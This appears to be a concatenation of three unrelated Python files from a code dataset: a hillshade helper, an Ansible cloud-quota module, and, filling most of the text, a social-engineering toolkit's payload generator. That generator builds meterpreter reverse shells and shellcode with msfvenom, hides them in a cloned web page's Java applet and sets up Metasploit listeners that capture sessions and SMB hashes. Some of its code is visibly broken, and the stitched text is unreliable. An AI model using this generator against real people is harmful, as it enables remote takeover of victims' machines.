cmap - a colormap (e.g matplotlib.colors.LinearSegmentedColormap
instance)
scale,azdeg,altdeg - parameters for hilshade function see there for
more details
output:
rgb - an rgb set of the Pegtop soft light composition of the data and
intensity can be used as input for imshow()
based on ImageMagick's Pegtop_light:
http://www.imagemagick.org/Usage/compose/#pegtoplight'''
if intensity is None:
# hilshading the data
intensity = hillshade(a,scale=10.0,azdeg=165.0,altdeg=45.0)
else:
# or normalize the intensity
intensity = (intensity - intensity.min())/(intensity.max() - intensity.min())
# get rgb of normalized data based on cmap
rgb = cmap((a-a.min())/float(a.max()-a.min()))[:,:,:3]
# form an rgb eqvivalent of intensity
d = intensity.repeat(3).reshape(rgb.shape)
# simulate illumination based on pegtop algorithm.
rgb = 2*d*rgb+(rgb**2)*(1-2*d)
return rgb
def hillshade(data,scale=10.0,azdeg=165.0,altdeg=45.0):
''' convert data to hillshade based on matplotlib.colors.LightSource class.
input:
data - a 2-d array of data
scale - scaling value of the data. higher number = lower gradient
azdeg - where the light comes from: 0 south ; 90 east ; 180 north ;
270 west
altdeg - where the light comes from: 0 horison ; 90 zenith
output: a 2-d array of normalized hilshade
'''
# convert alt, az to radians
az = azdeg*pi/180.0
alt = altdeg*pi/180.0
# gradient in x and y directions
dx, dy = gradient(data/float(scale))
slope = 0.5*pi - arctan(hypot(dx, dy))
aspect = arctan2(dx, dy)
intensity = sin(alt)*sin(slope) + cos(alt)*cos(slope)*cos(-az - aspect - 0.5*pi)
intensity = (intensity - intensity.min())/(intensity.max() - intensity.min())
return intensity
| 44.421053 | 90 | 0.639021 |
cf1a96ce22487299f9e15346ca4ced28f3540a43 | 1,989 | py | Python | plugins/modules/ces_quotas_info.py | shaderecker/ansible-collection-cloud | d347379181c66db8d0c775c6f0647e928a90ba70 | [
"Apache-2.0"
] | null | null | null | plugins/modules/ces_quotas_info.py | shaderecker/ansible-collection-cloud | d347379181c66db8d0c775c6f0647e928a90ba70 | [
"Apache-2.0"
] | null | null | null | plugins/modules/ces_quotas_info.py | shaderecker/ansible-collection-cloud | d347379181c66db8d0c775c6f0647e928a90ba70 | [
"Apache-2.0"
] | 1 | 2021-03-24T06:03:58.000Z | 2021-03-24T06:03:58.000Z | #!/usr/bin/python
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
DOCUMENTATION = '''
module: ces_quotas_info
short_description: Get resource quotas
extends_documentation_fragment: opentelekomcloud.cloud.otc
version_added: "0.3.0"
author: "Sebastian Gode (@SebastianGode)"
description:
    - Get resource quotas
requirements: ["openstacksdk", "otcextensions"]
'''
RETURN = '''
quotas:
description: Dictionary of Quotas
returned: changed
type: list
sample: [
{
"id": null,
"name": null,
"resources": [
{
"id": null,
"location": null,
"name": null,
"quota": 100,
"type": "alarm",
"unit": "",
"used": 1
}
]
}
]
'''
EXAMPLES = '''
# Query Alarm Quotas
- opentelekomcloud.cloud.ces_quotas_info:
'''
from ansible_collections.opentelekomcloud.cloud.plugins.module_utils.otc import OTCModule
class CesQuotasInfoModule(OTCModule):
argument_spec = dict()
def run(self):
data = []
query = {}
for raw in self.conn.ces.quotas(**query):
dt = raw.to_dict()
dt.pop('location')
data.append(dt)
self.exit(
changed=False,
quotas=data
)
def main():
module = CesQuotasInfoModule()
module()
if __name__ == '__main__':
main()
| 23.963855 | 89 | 0.591755 |
20f8582b4fe695877eb4c6608b957c6cdb526adc | 40,268 | py | Python | src/core/payloadgen/create_payloads.py | rockstar9788/socialtoolkit | 02e40c6f89d5a78c233449c310b5d3c1e2a12e0b | [
"MIT"
] | null | null | null | src/core/payloadgen/create_payloads.py | rockstar9788/socialtoolkit | 02e40c6f89d5a78c233449c310b5d3c1e2a12e0b | [
"MIT"
] | null | null | null | src/core/payloadgen/create_payloads.py | rockstar9788/socialtoolkit | 02e40c6f89d5a78c233449c310b5d3c1e2a12e0b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# Import modules
import subprocess
import time
import sys
import os
import re
import socket
import base64
from src.core.setcore import *
from src.core.menu.text import *
from src.core.dictionaries import *
try:
if len(check_options("IPADDR=")) > 2:
ipaddr = check_options("IPADDR=")
else:
ipaddr = ""
except:
ipaddr = ""
me = mod_name()
listener = "notdefined"
definepath = os.getcwd()
sys.path.append(definepath)
port1 = "8080"
port2 = "8081"
operating_system = check_os()
# check stage encoding - shikata ga nai for payload delivery
stage_encoding = check_config("STAGE_ENCODING=").lower()
if stage_encoding == "off":
stage_encoding = "false"
else:
stage_encoding = "true"
configfile = open("/etc/setoolkit/set.config", "r").readlines()
# check the metasploit path
msf_path = meta_path()
# check the config files for all of the flags needed for the file
auto_migrate = check_config("AUTO_MIGRATE=")
meterpreter_multi = check_config("METERPRETER_MULTI_SCRIPT=")
linux_meterpreter_multi = check_config("LINUX_METERPRETER_MULTI_SCRIPT=")
meterpreter_multi_command = check_config("METERPRETER_MULTI_COMMANDS=")
meterpreter_multi_command = meterpreter_multi_command.replace(";", "\n")
linux_meterpreter_multi_command = check_config("LINUX_METERPRETER_MULTI_COMMANDS=")
linux_meterpreter_multi_command = linux_meterpreter_multi_command.replace(";", "\n")
unc_embed = check_config("UNC_EMBED=")
attack_vector = 0
linosx = 0
multiattack = ""
# grab attack vector
if os.path.isfile(userconfigpath + "attack_vector"):
fileopen = open(userconfigpath + "attack_vector", "r")
for line in fileopen:
line = line.rstrip()
if line == "java":
attack_vector = "java"
if line == "multiattack":
attack_vector = "multiattack"
multiattack = open(userconfigpath + "multi_payload", "w")
# here is a place holder for the multi attack java
# multiattack outputs a file called multi_java if
# this file is present it will allow additional
# functionality
multiattack_java = "off"
if os.path.isfile(userconfigpath + "multi_java"):
multiattack_java = "on"
# custom payloadgen
payloadgen = "regular"
if os.path.isfile(userconfigpath + "payloadgen"):
payloadgen = "solo"
#
# grab ipaddr if it hasn't been identified yet
#
if check_options("IPADDR=") == False:
fileopen = open("/etc/setoolkit/set.config", "r")
data = fileopen.read()
match = re.search("AUTO_DETECT=ON", data)
if match:
try:
ipaddr = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
ipaddr.connect(('google.com', 0))
ipaddr.settimeout(2)
ipaddr = ipaddr.getsockname()[0]
update_options("IPADDR=" + ipaddr)
except Exception as e:
log(e)
ipaddr = raw_input(
setprompt(["4"], "IP address for the payload listener (LHOST)"))
update_options("IPADDR=" + ipaddr)
# if AUTO_DETECT=OFF prompt for IP Address
match = re.search("AUTO_DETECT=OFF", data)
if match:
ipaddr = raw_input(
setprompt(["4"], "Enter the IP address for the payload (reverse)"))
update_options("IPADDR=" + ipaddr)
# payload selection here
try:
# Specify path to metasploit
path = msf_path
# Specify payload
# this is encoding
encode = ""
# this is payload
choice1 = ""
# this is port
choice3 = ""
if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"):
fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r")
for line in fileopen:
# this reads in the first line of the file which happens to be port
# when calling through core
choice3 = line.rstrip()
# change attack_vector to nothing
attack_vector = ""
# specify payload
choice1 = "windows/meterpreter/reverse_tcp"
# encode using backdoored executable
encode = "16"
# if we don't trigger on the standard core api call
if choice1 == "":
#
# USER INPUT: SHOW PAYLOAD MENU 1 #
#
debug_msg(me, "printing 'text.payload_menu_1'", 5)
show_payload_menu1 = create_menu(payload_menu_1_text, payload_menu_1)
choice1 = raw_input(setprompt(["4"], ""))
# default blank then select pyinjector
if choice1 == "":
choice1 = "1"
# check the length and make sure it works
if choice1 != "":
choice1 = check_length(choice1, 8)
# convert it to a string
choice1 = str(choice1)
custom = 0
counter = 0
flag = 0
encode_stop = 0
# Condition testing of 'choice1'
# Will use a dictionary list
if choice1 == "exit":
exit_set()
if choice1 == '':
choice1 = ("1")
if choice1 == '5' or choice1 == '6' or choice1 == '7':
encode_stop = 1
encode = ""
if choice1 == '7':
flag = 1
# here we specify shellcodeexec
if choice1 == '1' or choice1 == '2' or choice1 == '6' or choice1 == '8':
encode_stop = 1
encode = 0
# 11 is the set interactive shell, 12 is set rev http shell and 13 is
# ratte listener
if choice1 == '3' or choice1 == '4' or choice1 == "5":
encoder = 'false'
payloadgen = 'solo'
encode_stop = 1
filewrite = open(userconfigpath + "set.payload", "w")
# select setshell
if choice1 == '3':
filewrite.write("SETSHELL")
# select setshell_reverse
if choice1 == '4':
filewrite.write("SETSHELL_HTTP")
# select ratte
if choice1 == '5':
filewrite.write("RATTE")
filewrite.close()
if choice1 != "7":
# if not then import the payload selection
choice1 = ms_payload_2(choice1)
# don't do courtesy shell
if counter == 0:
courtesyshell = ("")
# if custom
if choice1 == '7':
print_info("Example: /root/custom.exe")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if not os.path.isfile(choice1):
while 1:
print_error("ERROR:File not found. Try Again.")
choice1 = raw_input(setprompt(["4"], "Enter the path to your executable"))
if os.path.isfile(choice1): break
update_options("CUSTOM_EXE=%s" % (choice1))
custom = 1
# if we are using our own executable
if custom == 1:
check_write = open(userconfigpath + "custom.exe", "w")
check_write.write("VALID")
check_write.close()
shutil.copyfile("%s" % (choice1), "msf.exe")
shutil.copyfile("msf.exe", userconfigpath + "msf.exe")
# Specify Encoding Option
encoder = "false"
if choice1 == "cmd/multi": update_options("CUSTOM_EXE=CMD/MULTI")
# if we aren't using the set shell
if choice1 != "set/reverse_shell":
# we need to rewrite index.html real quick because it has a parameter
# that could get confusing
if os.path.isfile(userconfigpath + "web_clone/index.html"):
fileopen = open(userconfigpath + "web_clone/index.html", "r")
data = fileopen.read()
data = data.replace("freehugs", "")
os.remove(userconfigpath + "web_clone/index.html")
filewrite = open(userconfigpath + "web_clone/index.html", "w")
filewrite.write(data)
filewrite.close()
# Specify Remote Host if ipaddr.file is missing (should never get here)
if check_options("IPADDR=") == 0:
choice2 = raw_input(setprompt(
["4"], "IP Address of the listener/attacker (reverse) or host/victim (bind shell)"))
update_options("IPADDR=" + choice2)
choice2 = check_options("IPADDR=")
# specify the port for the listener
if choice3 == "":
if choice1 != "shellcode/multipyinject":
if choice1 != "cmd/multi":
if custom == 0:
choice3 = raw_input(setprompt(["4"], "PORT of the listener [443]"))
# here we check if the user really wants to use port 80
if choice3 == "80":
print_warning(
"WARNING: SET Web Server requires port 80 to listen.")
print_warning(
"WARNING: Are you sure you want to proceed with port 80?")
port_choice_option = raw_input(
"\nDo you want to keep port 80? [y/n]")
if port_choice_option == "n":
# reprompt it
choice3 = raw_input(setprompt(["4"], "PORT of listener [443]"))
if choice3 == '':
choice3 = '443'
# this is needed for the set_payload
update_options("PORT=" + choice3)
# if we are using the SET interactive shell then do this
if choice1 == "set/reverse_shell":
encoder = "false"
filewrite = open(userconfigpath + "set.payload.posix", "w")
filewrite.write("true")
filewrite.close()
import src.core.payloadprep
# if were using the multiattack option
if attack_vector == "multiattack":
multiattack.write("MAIN=" + str(choice3) + "\n")
multiattack.write("MAINPAYLOAD=" + str(choice1) + "\n")
# if encoding is required, it will place 1msf.exe first then encode it
# to msf.exe
if encoder == "true":
choice4 = ("raw")
msf_filename = ("1msf.exe")
if encoder == "false":
choice4 = ("exe")
msf_filename = ("msf.exe")
# set choice to blank for ALL PORTS scan
if flag == 0:
portnum = "LPORT=" + choice3
if flag == 1:
portnum = ""
if encode != "BACKDOOR":
# if we aren't using the set reverse shell
if choice1 != "set/reverse_shell":
# if we are using shellcodeexec
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_https]"))
# select default meterpreter reverse tcp
if choice9 == "":
choice9 = "windows/meterpreter/reverse_https"
if choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...")
subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi":
# here we update set options to specify pyinjection and multipy
update_options("PYINJECTION=ON")
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)):
os.remove("%s/meta_config_multipyinjector" % (userconfigpath))
# remove any old payload options
if os.path.isfile(userconfigpath + "payload.options.shellcode"):
os.remove(userconfigpath + "payload_options.shellcode")
# this is the file that gets saved with the payload and
# port options
if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a")
while 1:
# don't need any options here
if choice1 == "cmd/multi": break
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(
setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# check the ipaddr
if ipaddr == "":
# grab ipaddr if not defined
ipaddr = check_options("IPADDR=")
# break out if not needed
if choice9 == "6":
break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
# here we prep our meta config to listen on all
# the ports we want - free hugs all around
filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a")
port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port))
filewrite.close()
if choice1 != "cmd/multi":
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
# fix port num
if "multipyinject" in choice1:
portnum = shellcode_port
else:
portnum = portnum.replace("LPORT=", "")
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp":
shellcode = metasploit_shellcode(choice9, choice2, portnum)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# here we write out the payload and port for later
# use in powershell injection
payload_options.write(choice9 + " " + portnum + ",")
# break out of the loop if we are only using one
# payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
if choice1 != "cmd/multi":
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
print_status("Encrypting the shellcode via AES 256 encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w")
filewrite.write(shellcode)
filewrite.close()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# close the pyinjector file for ports and payload
payload_options.close()
# here we are going to encode the payload via base64
fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = str(data)
data = base64.b64encode(b'data')
# encode it again for the fun 2
data = base64.b64encode(b'data')
# again 3
data = base64.b64encode(b'data')
# again 4
data = base64.b64encode(b'data')
# again 5
data = base64.b64encode(b'data')
# again 6
data = base64.b64encode(b'data')
# again 7
data = base64.b64encode(b'data')
# again 8
data = base64.b64encode(b'data')
# 9
data = base64.b64encode(b'data')
# 10
data = base64.b64encode(b'data')
# last one
data = base64.b64encode(b'data')
#
filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w")
filewrite.write(str(data))
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3, 3).upper()
if choice1 == "shellcode/alphanum":
fileopen = open("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb").read()
if choice1 == "shellcode/pyinject":
fileopen = open("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb").read()
if choice1 == "shellcode/multipyinject":
fileopen = open("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb").read()
# write out the payload
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject":
filewrite = open(userconfigpath + "msf.exe", "wb")
filewrite.write(fileopen)
filewrite.close()
subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
# we need to read in the old index.html file because its
# already generated, need to present the alphanum to it
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r")
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace(
'param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(b'secret')
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(str(data))
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = open(userconfigpath + "metasploit.payload", "w")
filewrite.write(choice1)
filewrite.close()
# import if on
setshell_counter = 0
powershell = check_config("POWERSHELL_INJECTION=")
if powershell.lower() == "on" or powershell.lower() == "yes":
if choice1 == "set/reverse_shell" or choice1 == "RATTE":
print_status("Please note that the SETSHELL and RATTE are not compatible with the powershell injection technique. Disabling the powershell attack.")
setshell_counter = 1
if setshell_counter == 0:
if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum":
if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)):
if choice1 != "cmd/multi":
try: core.module_reload(src.payloads.powershell.prep)
except: import src.payloads.powershell.prep
if os.path.isfile("%s/x86.powershell" % (userconfigpath)):
fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r")
x86 = fileopen1.read()
x86 = "powershell -ec " + x86
# if we specified option cmd/multi which allows us to enter commands in instead and execute them many times
if choice1 == "cmd/multi":
print_status("This section will allow you to specify your own .txt file which can contain one more multiple commands. In order to execute multiple commands you would enter them in for example: cmd1,cmd2,cmd3,cmd4. In the background the Java Applet will enter in cmd /c 'yourcommands here'. You need to provide a path to the txt file that contains all of your commands or payloads split by commas. If just one, then just use no ,.")
filepath = raw_input("\nEnter the path to the file that contains commands: ")
while 1:
if not os.path.isfile(filepath):
filepath = raw_input("[!] File not found.\nEnter the path again and make sure file is there: ")
if os.path.isfile(filepath): break
x86 = open(filepath, "r").read()
print_status("Multi-command payload delivery for Java Applet selected.")
print_status("Embedding commands into Java Applet parameters...")
print_status("Note that these will be base64-encoded once, regardless of the payload..")
fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# encode once, will need to decode later
x86 = x86.encode("utf-8")
base_encode = base64.b64encode(x86)
data = data.replace('param name="5" value=""', 'param name="5" value="%s"' % (base_encode))
data = data.replace('param name="6" value=""', 'param name="6" value="%s"' % (base_encode))
if choice1 == "cmd/multi": data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if choice1 != "cmd/multi":
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
if deploy_binaries.lower() == "y" or deploy_binaries.lower() == "yes":
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait()
# here we specify the binary to deploy if we are using ones that are
# required to drop binaries
if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi":
fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r")
filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w")
data = fileopen3.read()
# check if we don't want to deploy binaries
data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
# specify attack vector as SET interactive shell
if choice1 == "set/reverse_shell":
attack_vector = "set_payload"
# if we have the java attack, multiattack java, and the set interactive
# shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
# pull in the ports from config
port1 = check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port
# conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
# deploy nix and linux binaries
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
# if we are using a custom linux/osx payload
if check_config("CUSTOM_LINUX_OSX_PAYLOAD=").lower() == "on":
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
print_status(
"Copying custom payloads into proper directory structure.")
# if we didn't specify blank
if osx_path != "":
while 1:
if not os.path.isfile(osx_path):
print_error(
"File not found, enter the path again.")
osx_path = raw_input(
"Enter the path for the custom OSX payload (blank for nothing): ")
if os.path.isfile(osx_path):
break
if osx_path != "":
# copy the payload
shutil.copyfile(osx_path, userconfigpath + "mac.bin")
# if linux payload
if lin_path != "":
while 1:
if not os.path.isfile(lin_path):
print_error(
"File not found, enter the path again.")
lin_path = raw_input(
"Enter the path for the custom Linux payload (blank for nothing): ")
if os.path.isfile(lin_path):
break
if lin_path != "":
# copy the payload
shutil.copyfile(lin_path, userconfigpath + "nix.bin")
else:
port2 = check_config("LINUX_REVERSE_PORT=")
osxpayload = check_config("OSX_PAYLOAD_DELIVERY=")
linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX=" + str(port1) + "\n")
multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload))
multiattack.write("LINUX=" + str(port2) + "\n")
multiattack.write("LINUXPAYLOAD=%s\n" % (linuxpayload))
osxcheck = check_options("MAC.BIN=")
linuxcheck = check_options("NIX.BIN=")
shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck))
shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck))
# try block here
try:
# if they want a listener, start here
if os.path.isfile("%s/meta_config" % (userconfigpath)):
# if its already created
filewrite = open("%s/meta_config" % (userconfigpath), "a")
if not os.path.isfile("%s/meta_config" % (userconfigpath)):
# if we need to create it
filewrite = open("%s/meta_config" % (userconfigpath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/multi_meta" % (userconfigpath)):
port_check = check_ports("%s/meta_config" % (userconfigpath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD " + choice1 + "\n")
filewrite.write("set LHOST " + ipaddr + "\n")
if flag == 0:
filewrite.write("set LPORT " + choice3 + "\n")
filewrite.write("set EnableStageEncoding %s\n" %
(stage_encoding))
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write(
"set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite = open(userconfigpath + "multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("exploit -j\r\n\r\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo":
filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD osx/x86/shell_reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port1 + "\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write(
"set PAYLOAD linux/x86/shell/reverse_tcp" + "\n")
filewrite.write("set LHOST " + choice2 + "\n")
filewrite.write("set LPORT " + port2 + "\n")
if linux_meterpreter_multi == "ON":
multiwrite = open(
userconfigpath + "lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write(
"set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
except Exception as e:
log(e)
print_error("ERROR:Something went wrong:")
print(bcolors.RED + "ERROR:" + str(e) + bcolors.ENDC)
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remnant files
if attack_vector == "multiattack":
multiattack.close()
if os.path.isfile("%s/fileformat.file" % (userconfigpath)):
filewrite = open("%s/payload.options" % (userconfigpath), "w")
filewrite.write(choice1 + " " + ipaddr + " " + choice3)
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile(userconfigpath + "meta_config"):
os.remove(userconfigpath + "meta_config")
| 50.779319 | 459 | 0.520686 |
